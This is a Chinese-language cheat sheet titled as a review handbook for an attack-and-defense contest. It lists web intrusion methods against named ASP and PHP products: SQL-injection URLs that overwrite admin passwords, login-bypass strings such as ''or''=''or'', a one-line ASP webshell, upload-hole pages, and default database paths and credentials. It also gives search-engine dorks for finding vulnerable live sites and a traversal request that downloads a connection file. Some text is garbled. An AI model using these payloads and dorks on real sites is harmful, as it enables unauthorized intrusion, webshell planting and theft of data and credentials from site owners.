网络攻防大赛复习手册 - 下载本文

加油!-----老菜鸟队

pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。而且可以上传任意文件,在asp和asp.net测试中都可以上传。 2.注入漏洞

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.] //看看是什么权限的,如果权限高的话,直接用SQLTOOLS进行连接就可以执行系统命令了。 http://注入网址 and 1=(Select IS_MEMBER(''db_owner''))

http://注入网址 And char(124)+Cast(IS_MEMBER(''db_owner'') as varchar(1))+char(124)=1 ;-- //检测是否有读取某数据库的权限

http://注入网址 and 1= (Select HAS_DBACCESS(''master''))

http://注入网址 And char(124)+Cast(HAS_DBACCESS(''master'') as varchar(1))+char(124)=1 -- 3.旁注,也就是跨站

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。 4.暴库:把二级目录中间的/换成\

eg:http://www.xxx.com/myhome/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

换成这样的形式提交:http://www.xxx.com/myhome\otherweb ... s.asp?BigClassName=职责范围&BigClassType=1

如果你能看到:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 5.绕过密码验证直接进入后台

’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

’or’’=’ \’) or (’a’=’a \’a’=’a

6.社会工程学

这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。。

EY:http://www.xxx.cn/waishi/admin admin waishi

7.写入ASP格式数据库

加油!-----老菜鸟队

就是一句话木马[〈%execute request(\〉 ],常用在留言本. EY:http://www.xxx.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马,然后利用ASP后缀名的数据库进行写入木马。也提醒一下站长,MDB数据库改为.asp后缀也是不安全的。 8.源码利用

很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。

EY:http://www.xxxx.edu.cn/xiaoyoulu/index.asp 这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

9.默认数据库/webshell路径利用

这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe

工具:网站猎手 挖掘鸡

EY:http://www.xxx.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。 EY:http://www.xxx.com/shop/admin/

http://www.xxx.com/babyfox/admin/#bb#dedsed2s/ 这样我们可以找到数据库,下载不用我教吧 11.工具溢出

.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL] 12.搜索引擎利用

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多,自已找〉 site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata

filetype:mdbinurl:database filetype:incconn

inurl:datafiletype:mdb

加油!-----老菜鸟队

13.COOKIE诈骗

把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了 14.利用常见的漏洞,如动网BBS

EY:http://www.xxx.com/bbs/index.asp

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

3拿到webshell权限的45种方法

1, 到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2, 到Google ,site:cq.cn inurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4,

关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 'or'='or' 5. 动感购物系统

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。 默认数据库地址blogdata/acblog.asa 关键字:acblog 7. 百度 /htdocs

注册里可以直接上传asa文件! 8. /Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version 9. 用挖掘机

关键字:Powered by WEBBOY 页面:/upfile.asp

10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞)

11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower ,

12. inurl:winnt\\system32\\inetsrv\\ 在google里面输入这个就可以找到很多网站 13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14. 键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛 挖掘鸡的关键字 添 setup.asp 15. VBulletin论坛的数据库

加油!-----老菜鸟队

默认数据库地址!

/includes/functions.php 工具:

1.网站猎手 下载地址:百度 Google! 2.Google 关键字:

Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了

16. 1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart open source。 这是一个商场系统。

2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~ 猜到,comersus.mdb. 是数据库名 数据库都是放在database/ 后的, 所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 那样把前一个''store/''除去,再加上database/comersus.mdb 试试 17.

无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/ 2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 数据库连接文件为 ***********/Conn.asp 18. 百度里输入/skins/default/ 19. 利用挖掘机

关键机:power by Discuz 路径:/wish.php 配合:

Discuz!论坛 wish.php远程包含漏洞 工具使用 20. 上传漏洞. 工具 : Domain3.5 网站猎手 1.5版

关键字powered by mypower

检测的页面或文件插入upfile_photo.asp 21. 新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 \关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录\

把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用#替换就可以下载了

加油!-----老菜鸟队

\\database\\#newasp.mdb

如:#xzws.mdb 改成#xzws.mdb 22. 通吃所有商城+动力上传系统 使用工具:挖掘鸡 v1.1 明小子 商城入侵:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成 漏洞页面:upload.asp upfile_flash.asp 动力入侵:

关键字:powered by mypower 漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp 23. 注射漏洞

百度搜索:oioj's blog 24 动易 列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp 25. 工具:网站猎手 关键词:inurl:Went.asp 后缀:manage/login.asp 口令:'or'='or' 26. 入侵魔兽私服

需要的工具:ASP木马一只。 Domain3.5明小子

关键字:All Right Reserved Design:游戏联盟 后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb 27. 漏洞是利用管理员iis设臵的失误 用baidu 关键字就是比较罕见的脚本名 动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp 28. 国外站的爆库漏洞

关键字:sad Raven's Guestbook 密码地址:/passwd.dat 后台地址:/admin.php

29. Discuz 4.1.0跨站漏洞 利用工具:1,WAP浏览器 2,WAP编码转换器